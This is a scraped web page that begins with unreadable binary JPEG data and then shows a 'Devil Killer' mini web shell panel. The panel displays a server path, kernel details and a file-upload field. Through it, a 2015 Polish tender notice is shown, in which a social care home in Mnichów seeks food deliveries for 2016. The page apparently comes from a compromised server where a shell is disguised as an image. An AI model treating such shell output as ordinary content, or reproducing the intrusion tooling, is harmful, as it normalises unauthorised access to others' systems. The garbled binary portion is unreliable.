JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151209/335866-N-2015.html

<p class="kh_header"><b>Jędrzejów: Przedmiotem zamówienia są :
       Sukcesywne dostawy w 2016 r. , do Domu Pomocy Społecznej w Mnichowie,
       artykułów ogólnospożywczych /(tj. artykułów spożywczych, artykułów
       mleczarskich, pieczywa, artykułów ciastkarskich i ciast, mięsa i wędlin, artykułów
       rybnych, jaj kurzych, mrożonek/.</b><br>
<b>Numer ogłoszenia: 335866 - 2015; data zamieszczenia: 09.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Mnichowie , Mnichów 135, 28-300 Jędrzejów, woj. świętokrzyskie, tel. 41 38-73-512, faks 41 38-73-512.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu terytorialnego (Powiatu Jędrzejowskiego).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są :
       Sukcesywne dostawy w 2016 r. , do Domu Pomocy Społecznej w Mnichowie,
       artykułów ogólnospożywczych /(tj. artykułów spożywczych, artykułów
       mleczarskich, pieczywa, artykułów ciastkarskich i ciast, mięsa i wędlin, artykułów
       rybnych, jaj kurzych, mrożonek/..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje : sukcesywne dostawy w 2016 r. , do Domu Pomocy Społecznej w Mnichowie artykułów ogólnospożywczych  tj. artykułów
spożywczych, artykułów mleczarskich, pieczywa, artykułów ciastkarskich i ciast,
mięsa i wędlin, artykułów rybnych, jaj kurzych, mrożonek.

Przedmiotem zamówienia są artykuły powszechnie dostępne /oferowane przez wiele podmiotów na rynku/ o ustalonych standardach jakościowych /znormalizowane i spełniające wymogi polskich norm, wymogi określone przepisami prawa polskiego, prawa żywnościowego   i prawa unii europejskiej, norm przyjętych powszechnie w odbiorze konsumenckim, zasad GMP/GHP,GAP, systemu HACCP/, które to standardy w/w dostawy muszą spełniać.

Terminy sukcesywnych dostaw przedmiotu zamówienia, ilość i rodzaj artykułów /asortymentów/ przedmiotu zamówienia w dostawie, uzależnione będą od potrzeb Zamawiającego.

Zamawiający wymaga aby :
- dostawy wykonywane były transportem samochodowym Wykonawcy /na jego koszt/,
  spełniającym wymogi
  przepisów dotyczących transportu żywności,
- dostawy po dowiezieniu do siedziby Zamawiającego, zostały niezwłocznie wniesione przez
  Wykonawcę do pomieszczenia wskazanego przez  Zamawiającego,
- terminy dostaw spełniały wymogi zapisów pkt.3.4 SIWZ.
- etykiety artykułów (asortymentów) dostaw, uwzględniały wymogi zapisów pkt.3.3 SIWZ,
- ceny określone w ofercie Wykonawcy, uwzględniały wszystkie koszty i składniki jakie należy
  zapłacić za przedmiot zamówienia, oraz żeby uwzględniały w/w wymogi  Zamawiającego,
Przedmiot zamówienia podzielony jest na następujące zadania :
a/ zadanie Nr 1 - dostawy artykułów spożywczych zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 2 do SIWZ. Dostawy dotyczą artykułów :
- produkty przemiału ziarna /CPV 15610000-7/ : kasze, płatki, ryż, mąka pszenna.
- skrobia i produkty skrobiowe /CPV 15620000-0/ : mąka ziemniaczana.
- olej roślinny /CPV 154 11100-3/ : olej jadalny uniwersalny.
- oliwa z oliwek /CPV 15411110-6/ : oliwa z oliwek.
- pasztet /CPV 15131310-1/ : pasztet drobiowy.
- owoce, warzywa i podobne produkty /CPV 15300000-1/ : dżemy, powidła, warzywa 
  przetworzone, soki, owoce suszone /śliwki/, groch łuskany /połówki/, fasola /Jaś/.
- cukier i produkty pokrewne /CPV 15830000-5/ : cukier biały, cukier waniliowy, cukier
  puder, miód, syrop cukrowy.
- makaron niegotowany /CPV 15851100-9/ : makarony.
- kawa, herbata i podobne produkty /CPV 15860000-4/ : kawa zbożowa, herbata.
- przyprawy i przyprawy korzenne /CPV 15870000-7/ : sól, cynamon, czosnek
  granulowany, gałka muszkatałowa, zioła prowansalskie /mieszanka/, przyprawa warzywna 
  do potraw, przyprawa do zup i sosów w płynie, kwasek cytrynowy, soda, ocet, ketchup,
  majonez, musztarda, pieprz czarny, przyprawy ziołowe.
- produkty dietetyczne /CPV 15882000-4/ : chrupki kukurydziane bezglutenowe,
  kaszki ryżowo-owocowe, kaszki mleczno-ryżowe z owocami, produkty niskobiałkowe PKU.
- różne produkty spożywcze i produkty suszone /CPV 15890000-3/ : drożdże,
  proszek do pieczenia, aromaty, bułka tarta, barszcz biały, przyprawa do zup, kostki
  rosołowe, grzyby suszone, kisiel, budyń, galaretki.
- kakao, czekolada i wyroby cukiernicze /CPV 15840000-8/ : kakao, biszkopty, wafle,
  ciastka kruche, paluszki słone, cukierki, czekolada, herbatniki i wafle w czekoladzie.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 2 /formularzu
  cenowym zadania Nr 1/.

b/ zadanie Nr 2 - dostawy artykułów mleczarskich zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 3 do SIWZ. Dostawy dotyczą artykułów :
- śmietana  /CPV 15512000-0/ : śmietany 18%,
- mleko w proszku /CPV 15511700-0/ : mleko w proszku,
- masło /CPV 15530000-2/ : masła świeżego,
- margaryna  /CPV 15431100-9/ : margaryny do smarowania, mixu tłuszczowego,
- jogurt bez dodatków substancji smakowych  /CPV 15551310-1/ : jogurtów
  naturalnych,
- jogurt z dodatkiem substancji smakowych /CPV 15551320-4/ : jogurtów owocowych,
  deserów,
- klasyfikowane produkty mleczarskie /CPV  15550000-8/ : kefiru,
- maślanka  /CPV  15551500-0/ : maślanki,
- pasty serowe do smarowania  /CPV 15545000-0/ : serków homogenizowanych
  waniliowych, serka wiejskiego i serów topionych,
- ser  twardy /CPV 15544000-3/ : sera twardego gouda i edamskiego,
- ser twarogowy  /CPV 15542100-0/ : twarogu półtłustego.  
                                                                        
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 3 /formularzu 
  cenowym zadania Nr 2/.

c/ zadanie Nr 3 - dostawy pieczywa zgodnie z formularzem cenowym stanowiącym  
    Zał. Nr 4 do SIWZ.  Dostawy dotyczą  artykułów :
- chleb  /CPV 15811100-7/ : chleba zwykłego, chleba graham, chleba słonecznikowego,  
- bułeczki /CPV 15811400-0/ : bułeczki pszenne, bułeczki graham.     

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 4 /formularzu
  cenowym zadania Nr 3/.

d/ zadanie Nr 4 - dostawy artykułów ciastkarskich i ciast  zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 5 do SIWZ. Dostawy dotyczą artykułów :
- wyroby ciastkarskie  /CPV 15812100-4/ : bułek drożdżowych z budyniem, serem, 
   jabłkami, jagodami oraz pączków,
- ciasta /CPV 15812200-5/ : ciast drożdżowych z makiem, ciast drożdżowych z serem, 
  strucli makowej, babki piaskowej, piernika z jabłkami.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 5 /formularzu
  cenowym zadania Nr 4/.

e/ zadanie Nr 5 - dostawy mięsa i wędlin zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 6 do SIWZ. Dostawy dotyczą artykułów :
- drób /CPV 15112000-6/ : kurczaka świeżego, filetów świeżych z kurczaka, korpusów
   mrożonych z kurczaka, udek świeżych z kurczaka,świeżego mięsa gulaszowego 
   z kurczaka
- podroby  /CPV 15114000-0/ : świeżych wątróbek i żołądków z kurczaka,
- wieprzowina /CPV 15113000-3/ : świeżej słoniny, świeżej łopatki wieprzowej bez kości, 
   świeżego schabu bez kości, świeżej karkówki bez kości ,
- mięso wołowe  /CPV 15111000-9/ :  świeżej łopatki  wołowej bez kości,
- wędliny drobiowe /CPV 15131135-0/ : pasztetu drobiowego, parówki drobiowej 
   /cienkiej/, batonu drobiowego, polędwicy drobiowej, baleronu z indyka,
- produkty wieprzowe /CPV 15131400-9/ : kiełbasy : krakowskiej, szynkowej,
  toruńskiej, wiejskiej, zwyczajnej, pieczeni rzymskiej, pieczeni tyrolskiej, szynki wiejskiej, 
  kaszani, kiszki pasztetowej, salcesonu wiejskiego, boczku wędzonego.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 6 /formularzu
  cenowym zadania Nr 5/.

f/ zadanie Nr 6 - dostawy artykułów rybnych zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 7 do SIWZ. Dostawy dotyczą artykułów :
- ryby przetworzone i konserwowane  /CPV 15200000-0/ : filetów, płatów mrożonych 
  z : morszczuka, mintaja,  makreli wędzonej, śledzi solonych Matjas /filety/, śledzi w oleju
  /filety/, konserw rybnych : paprykarz szczeciński, śledź w pomidorach, filet z makreli 
  w oleju, filet z makreli w pomidorach.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 7 /formularzu
  cenowym zadania Nr 6/.

g/ zadanie Nr 7 - dostawy  jaj  zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 8 do SIWZ. Dostawy dotyczą artykułów :
- jaja /CPV  03142500-3/ : jaj kurzych.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 8 /formularzu
  cenowym zadania Nr 7/.

h/ zadanie Nr 8 - dostawy mrożonek zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 9 do SIWZ. Dostawy dotyczą artykułów :
- warzywa mrożone /CPV 15331100-8/ : mieszanki warzywnej, marchwi kostka, marchwi 
  z groszkiem, kalafiora, fasolki szparagowej,
- owoce przetworzone /CPV 15332100-5/ : mieszanki kompotowej mrożonej, truskawek  mrożonych.
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 9 /formularzu
  cenowym zadania Nr 8/.
Przedmiot zamówienia został szczegółowo opisany w załącznikach Nr 2-9 do SIWZ /formularzach cenowych poszczególnych zadań/..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy złożonego przez Wykonawcę oświadczenia o spełnieniu warunków określonych w art.22 ust 1 ustawy Prawo zamówień publicznych w/g wzoru stanowiącego  Załącznik Nr 10 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10 do SIWZ,
- złożonego przez Wykonawcę dokumentu o którym mowa w pkt. 7.1 b  SIWZ.
/w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w./.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10 do SIWZ,
- złożonego przez Wykonawcę dokumentu o którym mowa w pkt. 7.1 b  SIWZ.
/w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w./.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10 do SIWZ,
- złożonego przez Wykonawcę dokumentu o którym mowa w pkt. 7.1 b  SIWZ.
w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w./.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10 do SIWZ,
- złożonego przez Wykonawcę dokumentu o którym mowa w pkt. 7.1 b SIWZ.
/w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w./.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Wypełniony formularz oferty - w/g wzoru określonego w Załączniku Nr 1 do SIWZ .
2.  Wypełniony (wypełnione) i wyliczone (wyliczony) we wszystkich wierszach i kolumnach formularz /formularze/ cenowy /cenowe/ - wg wzoru /wzorów/ określonego /określonych/ w Załączniku /Załącznikach/ Nr 2-9 do SIWZ.
Uwaga : Wykonawca składa tylko formularze cenowe zadań na które składa ofertę.
3. Zgodnie z art.26 ust.2b Pzp Wykonawca może polegać na wiedzy i doświadczeniu,  potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
 Uwaga !  
Treść zobowiązania podmiotu trzeciego powinna określać :
 a/ zakresu dostępnych Wykonawcy zasobów innego podmiotu,
 b/ sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy 
      wykonaniu zamówienia,
 c/ charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
 d/ zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

  W sytuacji gdy przedmiotem oddania są zasoby nierozerwalnie związane z podmiotem  ich udzielającym /wiedza i doświadczenie/, niemożliwe do samodzielnego wykorzystania  i dalszego udzielenia ich bez zaangażowania podmiotu udzielającego /w wykonaniu zamówienia/, taki dokument powinien zawierać wyraźne nawiązanie do formy uczestnictwa tego podmiotu w wykonaniu zamówienia /np. podwykonawstwo, doradztwo, nadzór lub inne/. W przypadku wykazania się doświadczeniem i wiedzą innego podmiotu, Wykonawca jest zobowiązany udowodnić, że podmiot ten będzie uczestniczył w realizacji przedmiotu zamówienia. Ponadto wymaga się, aby podmiot udostępniający zasoby w złożonym zobowiązaniu o udostępnieniu zasobów oświadczył, że jest świadomy, że udostępnienie zasobów zgodnie z art 26 ust 2b Pzp wiąże się z jego odpowiedzialnością solidarną z Wykonawcą, za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy /art 26 ust 2e Pzp/.     
4.Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje
pełnomocnik - wg wzoru stanowiącego Załącznik Nr 14 do SIWZ.
 Pełnomocnictwo winno zawierać w szczególności wskazanie :
-    postępowania o zamówienie publiczne;
-    Wykonawcę ubiegającego się o udzielenie zamówienia,
-   określenie  ustanowionego Pełnomocnika oraz zakres jego umocowania.
5. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia
       publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
       zamówienia publicznego wykonawców występujących wspólnie w przypadku
       wspólnego ubiegania się o udzielenie niniejszego zamówienia - wg wzoru 
        stanowiącego Załącznik Nr 15 do SIWZ .

 Pełnomocnictwo winno zawierać w szczególności wskazanie :
-   postępowania o zamówienie publiczne;
- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy wraz z określeniem adresu siedziby;
-  określenie ustanowionego Pełnomocnika oraz zakres jego umocowania.

/Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenia zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców /
6. Każdy Wykonawca występujący wspólnie musi złożyć oddzielnie dokumenty wskazane w punkcie 7.2a, pkt 7.2b, pkt 7.4 SIWZ. 
7. Wykonawcy występujący wspólnie /w ramach konsorcjum, wspólnicy spółki cywilnej/ muszą złożyć łącznie dokumenty wskazane w punkcie 8.1, pkt 8.2, pkt 7.1a, pkt 7.5 oraz pkt 8.4 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatjedrzejow.pl /-jednost.organ.powiatu,/-dom pomoc.społ.,/-zamów.publiczne,/-dostawy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Mnichowie, Mnichów 135, 28-300 Jędrzejów, woj.świętokrzyskie, dział administracyjno-techniczny.</p>
